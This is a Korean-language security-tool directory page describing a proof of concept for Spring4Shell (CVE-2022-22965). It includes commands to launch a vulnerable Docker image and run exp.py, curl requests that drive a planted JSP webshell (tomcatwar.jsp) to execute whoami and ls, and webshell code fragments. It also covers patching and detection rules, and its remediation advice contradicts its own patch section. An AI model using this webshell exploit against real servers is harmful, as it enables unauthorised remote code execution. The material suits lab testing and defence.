Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
도구/GitHubGitHub/thegejr/springshell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

저장소 보기
1318214년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Spring Core RCE - CVE-2022-22965

3월 29일, Spring Cloud에 이어 Spring의 또 다른 중대한 취약점이 인터넷에서 발생했습니다: Spring Core RCE

3월 31일, Spring은 이 취약점을 수정하는 새 버전을 출시했습니다. 패치 섹션을 참조하세요.

3월 31일, 마침내 이 취약점에 CVE 번호가 지정되었으며, CVSS 점수 9.8(치명적)이 부여되었습니다.

개념 증명

이 익스플로잇은 사용하기 매우 쉬우므로 CVSS 점수 9.8이라는 매우 높은 점수를 받았습니다.

취약점을 테스트하려면 다음을 수행하면 됩니다.

취약한 Spring 도커 이미지를 시작합니다.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

이 명령은 취약한 Spring을 localhost:8082 주소에 바인딩합니다.

curl로 이미지가 올바르게 시작되었는지 확인합니다.

root@kitploit:~
curl http://localhost:8082

ok 응답이 반환되어야 합니다.

이제 취약한 이미지를 익스플로잇해 봅시다!

root@kitploit:~
python3 exp.py --url http://localhost:8082

The vulnerability exists .... 응답이 반환되어야 합니다.

이제 curl로 취약점을 익스플로잇할 수 있습니다.

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

유포 중인 PoC 코드

현재까지 익스플로잇은 exp.py로 업로드되어 있습니다.
유포 중인 PoC 코드
난처한 상황

패치

Spring은 이제 이 CVE를 해결하는 새 버전을 출시했습니다. Spring의 발표를 참조하세요.

취약점을 패치한 커밋

취약점 영향

  1. JDK 버전 9 이상
  2. Spring Framework 또는 파생 프레임워크가 사용됨

버그 수정 제안

현재 Spring은 공식적으로 패치를 출시하지 않았으므로 임시 해결책으로 jdk 버전을 낮추는 것이 권장됩니다.

블루 팀

Yara

  • Florian Roth - Spring4Shell 웹셸

Sigma

  • Emanuele De Lucia - .jsp 웹셸 생성

SPLUNK

  • Alex John - Splunk 탐지 SPL
도구 다운로드